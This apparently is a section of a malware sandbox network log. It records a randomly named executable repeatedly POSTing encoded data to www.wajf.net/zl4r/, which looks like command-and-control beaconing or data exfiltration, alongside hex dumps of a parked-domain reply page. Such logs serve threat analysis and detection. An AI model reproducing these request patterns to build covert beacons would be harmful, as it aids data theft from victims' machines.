                                  Data Ascii: ><path d="M543.79932,23.73541l2.86856,4.971a1.305,1.305,0,0,1-.51275,1.73306L523.95089,43.25681a1.25137,1.25137,0,0,1-1.70175-.45353l-2.86183-4.96766a1.24525,1.24525,0,0,1,.45656-1.70379l22.19448-12.82034A1.3124,1.3124,0,0,1,543.79932,23.73541
                                  Sep 16, 2024 09:32:54.009779930 CEST1236INData Raw: 6c 61 73 73 3d 22 63 6c 73 2d 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 64 3d 22 4d 35 30 32 2e 36 38 33 2c 32 38 2e 31 38 39 68 2d 35 2e 37 33 39 38 31 61 31 2e 33 30 36 34 2c 31 2e 33 30 36 34 2c 30 2c 30 2c 31 2d 31 2e 32 34 35 32 2d 31
                                  Data Ascii: lass="cls-2"></path><path d="M502.683,28.189h-5.73981a1.3064,1.3064,0,0,1-1.2452-1.30947V1.24856A1.25352,1.25352,0,0,1,496.94318,0H502.683a1.25422,1.25422,0,0,1,1.24856,1.24856v25.631A1.3069,1.3069,0,0,1,502.683,28.189Z" class="cls-2"></path><
                                  Sep 16, 2024 09:32:54.009813070 CEST1236INData Raw: 32 63 2d 31 31 2e 39 37 39 35 38 2c 30 2d 31 34 2e 39 30 37 2c 38 2e 35 30 31 37 2d 31 34 2e 39 30 37 2c 31 39 2e 39 32 32 34 35 76 31 30 2e 37 32 36 63 30 2c 31 31 2e 34 32 30 37 32 2c 32 2e 39 32 37 34 34 2c 31 39 2e 39 32 30 37 36 2c 31 34 2e
                                  Data Ascii: 2c-11.97958,0-14.907,8.5017-14.907,19.92245v10.726c0,11.42072,2.92744,19.92076,14.907,19.92076a81.24455,81.24455,0,0,0,13.37079-.9757Z" class="cls-2"></path><path d="M267.18568,150.10066H254.09246a2.80346,2.80346,0,0,1-2.6465-2.92778V97.16759c
                                  Sep 16, 2024 09:32:54.009845972 CEST1236INData Raw: 2e 39 34 33 35 31 63 30 2d 32 31 2e 37 32 39 35 31 2c 31 32 2e 31 31 37 31 39 2d 33 35 2e 33 38 31 35 37 2c 33 33 2e 34 32 39 35 2d 33 35 2e 33 38 31 35 37 2c 32 31 2e 34 35 33 36 33 2c 30 2c 33 33 2e 31 35 33 36 32 2c 31 34 2e 36 32 37 37 36 2c
                                  Data Ascii: .94351c0-21.72951,12.11719-35.38157,33.4295-35.38157,21.45363,0,33.15362,14.62776,33.15362,35.38157v7.7982C347.291,115.97606,346.45491,117.228,344.50486,117.228Zm-15.73972-13.65374c0-10.86391-5.98978-17.1343-14.62777-17.1343-8.63629,0-14.90365
                                  Sep 16, 2024 09:32:54.009944916 CEST1209INData Raw: 33 37 31 63 30 2d 31 31 2e 36 31 37 39 2c 36 2e 36 36 33 33 36 2d 32 30 2e 32 33 33 2c 31 39 2e 34 31 38 31 31 2d 32 30 2e 32 33 33 73 31 39 2e 34 32 31 34 38 2c 38 2e 36 31 35 31 2c 31 39 2e 34 32 31 34 38 2c 32 30 2e 32 33 33 56 31 33 30 2e 35
                                  Data Ascii: 371c0-11.6179,6.66336-20.233,19.41811-20.233s19.42148,8.6151,19.42148,20.233V130.518C818.9807,142.13962,812.314,150.74765,799.55922,150.74765Zm8.69383-26.81055c0-6.66-3.00617-10.97058-8.69383-10.97058-5.68732,0-8.69382,4.31058-8.69382,10.97058


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  38192.168.2.45584754.81.206.248805964C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  TimestampBytes transferredDirectionData
                                  Sep 16, 2024 09:32:56.095550060 CEST779OUTPOST /zl4r/ HTTP/1.1
                                  Host: www.wajf.net
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.wajf.net
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 222
                                  Referer: http://www.wajf.net/zl4r/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Raw: 68 32 50 74 39 3d 6e 43 61 54 77 75 7a 66 63 54 2b 31 35 7a 51 41 61 63 4e 4c 61 74 64 6b 35 64 4c 32 7a 71 6f 59 4b 44 61 63 56 6e 6f 5a 76 76 54 75 44 33 47 56 56 52 72 65 69 4f 68 74 59 6c 4a 56 56 30 35 6b 48 74 73 46 4e 6c 64 72 4a 59 4c 79 77 51 45 62 4a 58 6f 53 65 48 53 45 66 37 41 46 51 6f 44 75 4f 4e 56 6d 4a 6c 30 2f 79 6a 34 6a 33 58 64 68 4b 6d 67 34 42 42 50 50 57 51 64 43 41 6d 6a 4f 57 33 72 4d 38 44 54 4a 57 43 44 76 68 6d 41 78 35 57 43 7a 4d 46 6e 71 4b 6c 39 57 74 48 72 64 61 45 52 62 65 41 46 63 34 47 48 41 77 54 50 6c 31 2b 69 2b 4e 62 64 34 42 79 41 51 57 4a 4f 6b 70 2b 30 38 6f 77 6a 59 63 49 6e 4a 57 7a 4d 63 30 70 72 31 59 36 67 3d
                                  Data Ascii: h2Pt9=nCaTwuzfcT+15zQAacNLatdk5dL2zqoYKDacVnoZvvTuD3GVVRreiOhtYlJVV05kHtsFNldrJYLywQEbJXoSeHSEf7AFQoDuONVmJl0/yj4j3XdhKmg4BBPPWQdCAmjOW3rM8DTJWCDvhmAx5WCzMFnqKl9WtHrdaERbeAFc4GHAwTPl1+i+Nbd4ByAQWJOkp+08owjYcInJWzMc0pr1Y6g=
                                  Sep 16, 2024 09:32:56.563927889 CEST1236INHTTP/1.1 200 OK
                                  Date: Mon, 16 Sep 2024 07:32:56 GMT
                                  Content-Type: text/html; charset=utf-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Data Raw: 33 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 61 6d 65 42 72 69 67 68 74 20 2d 20 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 2c 20 64 69 76 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 [TRUNCATED]
                                  Data Ascii: 3151<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body, div { box-sizing: border-box; } body { background-color: #f7f7f7; font: 18px sans-serif; } .page { display: flex; flex-direction: column; min-height: 100vh; height: 100%; } .wrapper { display: flex; flex-direction: column; min-height: 100vh; height: 100%; align-items: center; justify-content: center; } .container { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; width: 90vw; [TRUNCATED]
                                  Sep 16, 2024 09:32:56.563945055 CEST1236INData Raw: 74 3a 20 34 30 76 77 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 37 30 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 36 34 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20
                                  Data Ascii: t: 40vw; max-height: 700px; min-height: 640px; background: #ffffff; border-radius: 1.5%; padding: 50px 5vw; } .main { display: flex;
                                  Sep 16, 2024 09:32:56.563957930 CEST1236INData Raw: 69 74 65 63 64 6e 2e 63 6f 6d 2f 6e 62 2f 63 64 6c 2f 63 6f 6d 69 6e 67 2d 73 6f 6f 6e 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6f 6d 6d 69 6e 67 20 73 6f 6f 6e 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22
                                  Data Ascii: itecdn.com/nb/cdl/coming-soon.png" alt="comming soon" /> <div class="main"> <h1>wajf.net is coming soon</h1> </div> <div>This domain is managed at <br> <a href="/
                                  Sep 16, 2024 09:32:56.563968897 CEST1236INData Raw: 2d 37 2e 36 36 30 35 39 2d 34 2e 30 33 38 2d 31 34 2e 37 36 34 2d 31 37 2e 31 33 34 36 34 2d 31 34 2e 37 36 34 48 33 37 38 2e 35 37 30 32 35 76 33 30 2e 36 34 36 37 34 63 33 2e 33 34 34 36 33 2c 30 2c 38 2e 34 39 36 36 36 2e 32 37 39 32 35 2c 31
                                  Data Ascii: -7.66059-4.038-14.764-17.13464-14.764H378.57025v30.64674c3.34463,0,8.49666.27925,11.42241.27925,17.82941,0,23.40032-4.59656,23.40032-14.34851Zm62.4236-33.0123a79.44713,79.44713,0,0,0-13.6487.9757v60.17443a2.80457,2.80457,0,0,1-2.64818,2.92778H
                                  Sep 16, 2024 09:32:56.563981056 CEST896INData Raw: 35 33 2d 33 33 2e 32 39 36 32 37 2d 33 34 2e 39 36 32 33 35 56 31 30 35 2e 35 32 36 63 30 2d 32 31 2e 37 33 31 31 39 2c 31 30 2e 38 36 35 36 2d 33 34 2e 39 36 34 2c 33 33 2e 32 39 36 32 37 2d 33 34 2e 39 36 34 41 31 31 38 2e 38 30 37 37 39 2c 31
                                  Data Ascii: 53-33.29627-34.96235V105.526c0-21.73119,10.8656-34.964,33.29627-34.964A118.80779,118.80779,0,0,1,581.4102,74.1828c3.20332.83607,3.76519,1.67248,3.76519,3.76216V149.8214C585.17539,169.60389,575.14452,177.95924,553.83389,177.95924ZM566.7858,86.8
                                  Sep 16, 2024 09:32:56.563996077 CEST1236INData Raw: 35 36 36 2c 31 35 30 2e 31 30 30 36 36 5a 6d 35 33 2e 38 38 34 32 31 2c 30 41 31 32 31 2e 32 38 36 37 34 2c 31 32 31 2e 32 38 36 37 34 2c 30 2c 30 2c 31 2c 36 39 37 2e 38 32 33 2c 31 35 31 2e 32 31 34 33 63 2d 31 33 2e 37 38 39 36 34 2c 30 2d 32
                                  Data Ascii: 566,150.10066Zm53.88421,0A121.28674,121.28674,0,0,1,697.823,151.2143c-13.78964,0-22.00708-4.73786-22.00708-20.89646V60.11556c0-1.53118,1.25529-2.50721,2.78647-2.78646l12.95191-2.22931h.4172a2.74559,2.74559,0,0,1,2.37229,2.78646V71.538h19.64152
                                  Sep 16, 2024 09:32:56.564006090 CEST1236INData Raw: 2c 30 2c 30 2c 31 2c 34 37 35 2e 35 36 33 35 37 2c 34 39 2e 35 37 35 5a 22 20 63 6c 61 73 73 3d 22 63 6c 73 2d 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 64 3d 22 4d 35 35 32 2e 32 36 2c 34 39 2e 35 37 35 76 35 2e 37 33 38 34 36 61 31 2e 33
                                  Data Ascii: ,0,0,1,475.56357,49.575Z" class="cls-2"></path><path d="M552.26,49.575v5.73846a1.30639,1.30639,0,0,1-1.31115,1.24352h-25.631a1.24975,1.24975,0,0,1-1.25192-1.24352V49.57666a1.25119,1.25119,0,0,1,1.24519-1.24688h25.63467A1.30971,1.30971,0,0,1,55
                                  Sep 16, 2024 09:32:56.564016104 CEST1236INData Raw: 2c 32 2e 37 38 39 35 31 48 32 2e 37 38 34 37 38 41 32 2e 37 39 34 35 36 2c 32 2e 37 39 34 35 36 2c 30 2c 30 2c 31 2c 30 2c 31 34 37 2e 33 31 31 31 35 56 35 32 2e 31 37 34 61 35 2e 35 38 38 31 39 2c 35 2e 35 38 38 31 39 2c 30 2c 30 2c 31 2c 35 2e
                                  Data Ascii: ,2.78951H2.78478A2.79456,2.79456,0,0,1,0,147.31115V52.174a5.58819,5.58819,0,0,1,5.56923-5.57091H20.61587c2.92407,0,4.45693.83641,6.12941,4.45726l32.4538,71.59518c.27926.69678.69645,1.11734,1.11533,1.11734.27925,0,.69813-.42056.69813-1.25529v-7
                                  Sep 16, 2024 09:32:56.564026117 CEST1236INData Raw: 32 36 31 39 2d 31 2e 31 31 35 33 32 2d 31 31 2e 32 38 33 31 32 2d 39 2e 31 39 33 31 2d 31 31 2e 32 38 33 31 32 68 2d 33 2e 33 34 33 63 2d 36 2e 34 30 38 36 36 2c 30 2d 39 2e 37 35 30 32 37 2c 31 2e 38 31 30 34 32 2d 39 2e 37 35 30 32 37 2c 31 31
                                  Data Ascii: 2619-1.11532-11.28312-9.1931-11.28312h-3.343c-6.40866,0-9.75027,1.81042-9.75027,11.28312v50.00529a2.80706,2.80706,0,0,1-2.64987,2.92778H172.60233a2.80415,2.80415,0,0,1-2.64482-2.92778V97.16759c0-17.55048,10.44672-26.60565,28.13818-26.60565h3.3
                                  Sep 16, 2024 09:32:56.564038038 CEST1236INData Raw: 38 2c 30 2c 30 2c 31 2c 31 2e 36 32 33 2c 31 2e 35 34 34 76 39 2e 31 38 30 33 33 41 31 2e 36 33 33 38 33 2c 31 2e 36 33 33 38 33 2c 30 2c 30 2c 31 2c 37 33 36 2e 34 38 35 32 36 2c 31 35 30 2e 31 30 30 36 36 5a 22 20 63 6c 61 73 73 3d 22 63 6c 73
                                  Data Ascii: 8,0,0,1,1.623,1.544v9.18033A1.63383,1.63383,0,0,1,736.48526,150.10066Z" class="cls-1"></path><path d="M774.02347,149.69625a44.86749,44.86749,0,0,1-10.48137,1.0514c-10.55977,0-18.52751-6.49547-18.52751-19.73976v-7.557c0-13.24462,7.96774-19.7468
                                  Sep 16, 2024 09:32:56.564495087 CEST761INData Raw: 35 2e 35 32 36 35 2d 31 2e 39 35 31 37 31 2d 36 2e 35 38 31 32 37 2d 35 2e 36 38 34 33 2d 36 2e 35 38 31 32 37 68 2d 31 2e 39 35 31 34 63 2d 34 2e 37 31 35 2c 30 2d 35 2e 33 36 35 36 37 2c 32 2e 36 30 32 34 33 2d 35 2e 33 36 35 36 37 2c 36 2e 35
                                  Data Ascii: 5.5265-1.95171-6.58127-5.6843-6.58127h-1.9514c-4.715,0-5.36567,2.60243-5.36567,6.58127v29.16333a1.63291,1.63291,0,0,1-1.54094,1.71185h-7.71778a1.63357,1.63357,0,0,1-1.5443-1.71185V119.22548c0-3.97884-.65069-6.58127-5.362-6.58127h-1.9551c-3.732


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  39192.168.2.45584854.81.206.248805964C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  TimestampBytes transferredDirectionData
                                  Sep 16, 2024 09:32:58.642357111 CEST10861OUTPOST /zl4r/ HTTP/1.1
                                  Host: www.wajf.net
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.wajf.net
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 10302
                                  Referer: http://www.wajf.net/zl4r/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Raw: 68 32 50 74 39 3d 6e 43 61 54 77 75 7a 66 63 54 2b 31 35 7a 51 41 61 63 4e 4c 61 74 64 6b 35 64 4c 32 7a 71 6f 59 4b 44 61 63 56 6e 6f 5a 76 76 72 75 44 68 36 56 55 79 7a 65 6a 4f 68 74 51 46 4a 57 56 30 34 6b 48 70 49 42 4e 6c 67 65 4a 61 7a 79 77 7a 4d 62 42 47 6f 53 52 48 53 45 51 62 41 59 55 6f 44 37 4f 4e 6c 71 4a 6d 4d 2f 79 6a 34 6a 33 57 74 68 44 58 67 34 44 42 50 4f 41 41 64 30 57 6d 6a 32 57 78 44 63 38 44 48 6a 57 52 4c 76 69 47 51 78 71 77 57 7a 41 46 6e 6f 4a 6c 39 4f 74 48 76 43 61 45 64 78 65 41 78 32 34 47 6a 41 77 58 2f 2f 75 4b 32 75 61 34 4d 69 56 7a 73 61 5a 59 6e 6c 69 4d 41 64 68 68 6a 5a 44 59 2f 45 5a 44 5a 37 6f 4b 72 4f 4b 71 51 6c 51 58 4e 53 67 2f 69 30 57 59 6d 53 43 6a 5a 67 55 76 43 36 4b 47 65 46 6c 63 45 52 62 47 4f 49 43 57 46 43 62 61 52 68 57 6d 6e 4a 50 49 56 35 34 6c 4b 65 78 72 54 61 61 65 53 6e 31 37 63 43 38 79 6f 43 4d 45 71 61 35 6f 79 4e 79 50 75 72 59 4c 39 34 5a 54 50 76 75 45 71 59 4d 68 39 4c 45 6f 48 37 4c 53 4e 2b 59 45 52 30 44 72 34 66 6f 71 35 74 [TRUNCATED]
                                  Data Ascii: h2Pt9=nCaTwuzfcT+15zQAacNLatdk5dL2zqoYKDacVnoZvvruDh6VUyzejOhtQFJWV04kHpIBNlgeJazywzMbBGoSRHSEQbAYUoD7ONlqJmM/yj4j3WthDXg4DBPOAAd0Wmj2WxDc8DHjWRLviGQxqwWzAFnoJl9OtHvCaEdxeAx24GjAwX//uK2ua4MiVzsaZYnliMAdhhjZDY/EZDZ7oKrOKqQlQXNSg/i0WYmSCjZgUvC6KGeFlcERbGOICWFCbaRhWmnJPIV54lKexrTaaeSn17cC8yoCMEqa5oyNyPurYL94ZTPvuEqYMh9LEoH7LSN+YER0Dr4foq5t1l43N9PlrkJeQjQeDQgXW3opbjT7Tyng8+KMkMROdlbbF1D/MeP9fv7Iza5om0vu8uYfKRqMzqYizT4eqGPpewahuTK4g1BvaOGrqxReL7NHxjpG1XG+Hrb/nWIfJgF45ciBLeARtpZ2NsfTQoKCXk+LzX8R2QLmr2qeOK/D0srXTTb8svzKvS8ctIrQ2MzZ0YqcmIuBZkBfC7B477a15HOjNbAWo5F2DbvYcrISGCbv5+m8hKIQNUoggBwbTivwoWeJQx4w5I0X/RlwOotlmDs2mWexTEKWMT1XSd84wyievSvhXjtHwm7R1aHVTgybfLjClmyhmsYVFpFYMtdNHyjELTaQZprRMsF5zrQWy29A+bJE/ZTliFOAwLvJeAKdDEl+ZduemHHkNlzb+5sq7OwK1dA3InDVDquIQ8jxD5A7ZPgimilTzIJ7AmymRDfZlGceM+myHksBzNWEJByRiXqlmMOW61pJLTcB5lVt3Egxow1tvm74mtxrGPsR1qQszzm0D7zsGfTUgUd6RBHFTlGlKPYGXvxfzQJIvlGi06rE33bC6eYtA/n0FQ7M2ZsW7sk41aHT6Eo3X8Xq2y0nZrRsPjc5qgsiQFoL8tTkBQVW4W5AlOtiwahKm1hUPFNMIBlSdD66id4aYEVnyGrGy3jhu5Elw/vbvf [TRUNCATED]
                                  Sep 16, 2024 09:32:59.102894068 CEST1236INHTTP/1.1 200 OK
                                  Date: Mon, 16 Sep 2024 07:32:59 GMT
                                  Content-Type: text/html; charset=utf-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Data Raw: 33 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 61 6d 65 42 72 69 67 68 74 20 2d 20 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 2c 20 64 69 76 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 [TRUNCATED]
                                  Data Ascii: 3151<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body, div { box-sizing: border-box; } body { background-color: #f7f7f7; font: 18px sans-serif; } .page { display: flex; flex-direction: column; min-height: 100vh; height: 100%; } .wrapper { display: flex; flex-direction: column; min-height: 100vh; height: 100%; align-items: center; justify-content: center; } .container { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; width: 90vw; [TRUNCATED]
                                  Sep 16, 2024 09:32:59.102920055 CEST1236INData Raw: 74 3a 20 34 30 76 77 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 37 30 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 36 34 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20
                                  Data Ascii: t: 40vw; max-height: 700px; min-height: 640px; background: #ffffff; border-radius: 1.5%; padding: 50px 5vw; } .main { display: flex;
                                  Sep 16, 2024 09:32:59.102931023 CEST1236INData Raw: 69 74 65 63 64 6e 2e 63 6f 6d 2f 6e 62 2f 63 64 6c 2f 63 6f 6d 69 6e 67 2d 73 6f 6f 6e 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6f 6d 6d 69 6e 67 20 73 6f 6f 6e 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22
                                  Data Ascii: itecdn.com/nb/cdl/coming-soon.png" alt="comming soon" /> <div class="main"> <h1>wajf.net is coming soon</h1> </div> <div>This domain is managed at <br> <a href="/
                                  Sep 16, 2024 09:32:59.102947950 CEST1236INData Raw: 2d 37 2e 36 36 30 35 39 2d 34 2e 30 33 38 2d 31 34 2e 37 36 34 2d 31 37 2e 31 33 34 36 34 2d 31 34 2e 37 36 34 48 33 37 38 2e 35 37 30 32 35 76 33 30 2e 36 34 36 37 34 63 33 2e 33 34 34 36 33 2c 30 2c 38 2e 34 39 36 36 36 2e 32 37 39 32 35 2c 31
                                  Data Ascii: -7.66059-4.038-14.764-17.13464-14.764H378.57025v30.64674c3.34463,0,8.49666.27925,11.42241.27925,17.82941,0,23.40032-4.59656,23.40032-14.34851Zm62.4236-33.0123a79.44713,79.44713,0,0,0-13.6487.9757v60.17443a2.80457,2.80457,0,0,1-2.64818,2.92778H
                                  Sep 16, 2024 09:32:59.102960110 CEST1236INData Raw: 35 33 2d 33 33 2e 32 39 36 32 37 2d 33 34 2e 39 36 32 33 35 56 31 30 35 2e 35 32 36 63 30 2d 32 31 2e 37 33 31 31 39 2c 31 30 2e 38 36 35 36 2d 33 34 2e 39 36 34 2c 33 33 2e 32 39 36 32 37 2d 33 34 2e 39 36 34 41 31 31 38 2e 38 30 37 37 39 2c 31
                                  Data Ascii: 53-33.29627-34.96235V105.526c0-21.73119,10.8656-34.964,33.29627-34.964A118.80779,118.80779,0,0,1,581.4102,74.1828c3.20332.83607,3.76519,1.67248,3.76519,3.76216V149.8214C585.17539,169.60389,575.14452,177.95924,553.83389,177.95924ZM566.7858,86.8
                                  Sep 16, 2024 09:32:59.102971077 CEST1236INData Raw: 2e 39 39 30 32 63 30 2c 35 2e 35 37 35 36 32 2c 32 2e 35 30 36 38 38 2c 36 2e 35 34 38 32 39 2c 38 2e 34 39 33 33 2c 36 2e 35 34 38 32 39 48 37 31 33 2e 38 34 34 63 31 2e 38 31 33 34 35 2c 30 2c 32 2e 39 32 34 30 37 2e 36 39 36 34 35 2c 32 2e 39
                                  Data Ascii: .9902c0,5.57562,2.50688,6.54829,8.4933,6.54829H713.844c1.81345,0,2.92407.69645,2.92407,2.08968v8.63763C716.76805,148.9833,715.93366,149.8214,714.11987,150.10066Z" class="cls-1"></path><path d="M523.55018,5.59211l4.971,2.86822a1.29783,1.29783,0
                                  Sep 16, 2024 09:32:59.102982998 CEST1236INData Raw: 2d 31 2e 37 36 31 2e 34 32 33 39 32 4c 34 35 33 2e 34 31 38 35 35 2c 33 30 2e 34 30 38 35 33 61 31 2e 32 35 34 32 33 2c 31 2e 32 35 34 32 33 2c 30 2c 30 2c 31 2d 2e 34 35 36 39 2d 31 2e 37 30 33 37 38 6c 32 2e 38 36 35 31 39 2d 34 2e 39 36 36 33
                                  Data Ascii: -1.761.42392L453.41855,30.40853a1.25423,1.25423,0,0,1-.4569-1.70378l2.86519-4.96631a1.25738,1.25738,0,0,1,1.70849-.45656l22.19448,12.81733A1.30449,1.30449,0,0,1,480.24559,37.83394Z" class="cls-2"></path><path d="M490.17148,30.00412l-4.96463,2.
                                  Sep 16, 2024 09:32:59.102994919 CEST1000INData Raw: 2e 35 38 37 34 2c 35 2e 35 38 37 34 2c 30 2c 30 2c 31 2c 37 32 2e 37 31 31 31 38 2c 31 35 30 2e 31 30 30 36 36 5a 22 20 63 6c 61 73 73 3d 22 63 6c 73 2d 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 64 3d 22 4d 31 35 32 2e 38 31 36 34 39 2c 31
                                  Data Ascii: .5874,5.5874,0,0,1,72.71118,150.10066Z" class="cls-2"></path><path d="M152.81649,147.59344a118.76528,118.76528,0,0,1-27.99855,3.62086c-22.42764,0-33.28988-13.23453-33.28988-34.96235V105.526c0-21.73119,10.86224-34.964,33.28988-34.964a118.86956,
                                  Sep 16, 2024 09:32:59.103007078 CEST1236INData Raw: 36 2c 32 2e 38 30 37 30 36 2c 30 2c 30 2c 31 2d 32 2e 36 34 39 38 37 2c 32 2e 39 32 37 37 38 48 31 37 32 2e 36 30 32 33 33 61 32 2e 38 30 34 31 35 2c 32 2e 38 30 34 31 35 2c 30 2c 30 2c 31 2d 32 2e 36 34 34 38 32 2d 32 2e 39 32 37 37 38 56 39 37
                                  Data Ascii: 6,2.80706,0,0,1-2.64987,2.92778H172.60233a2.80415,2.80415,0,0,1-2.64482-2.92778V97.16759c0-17.55048,10.44672-26.60565,28.13818-26.60565h3.343c7.80021,0,14.06757,1.81043,18.38655,5.57259,4.319-3.76216,10.72429-5.57259,18.52585-5.57259h3.34329c1
                                  Sep 16, 2024 09:32:59.103019953 CEST1236INData Raw: 37 34 2e 30 32 33 34 37 2c 31 34 39 2e 36 39 36 32 35 61 34 34 2e 38 36 37 34 39 2c 34 34 2e 38 36 37 34 39 2c 30 2c 30 2c 31 2d 31 30 2e 34 38 31 33 37 2c 31 2e 30 35 31 34 63 2d 31 30 2e 35 35 39 37 37 2c 30 2d 31 38 2e 35 32 37 35 31 2d 36 2e
                                  Data Ascii: 74.02347,149.69625a44.86749,44.86749,0,0,1-10.48137,1.0514c-10.55977,0-18.52751-6.49547-18.52751-19.73976v-7.557c0-13.24462,7.96774-19.74683,18.52751-19.74683a44.5792,44.5792,0,0,1,10.48137,1.05814c1.37978.32534,1.70512.81151,1.70512,2.11256v5
                                  Sep 16, 2024 09:32:59.103074074 CEST657INData Raw: 31 2e 36 33 32 39 31 2c 30 2c 30 2c 31 2d 31 2e 35 34 30 39 34 2c 31 2e 37 31 31 38 35 68 2d 37 2e 37 31 37 37 38 61 31 2e 36 33 33 35 37 2c 31 2e 36 33 33 35 37 2c 30 2c 30 2c 31 2d 31 2e 35 34 34 33 2d 31 2e 37 31 31 38 35 56 31 31 39 2e 32 32
                                  Data Ascii: 1.63291,0,0,1-1.54094,1.71185h-7.71778a1.63357,1.63357,0,0,1-1.5443-1.71185V119.22548c0-3.97884-.65069-6.58127-5.362-6.58127h-1.9551c-3.73256,0-5.68429,1.05477-5.68429,6.58127v29.16333a1.636,1.636,0,0,1-1.54733,1.71185H827.2866a1.63824,1.63824


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
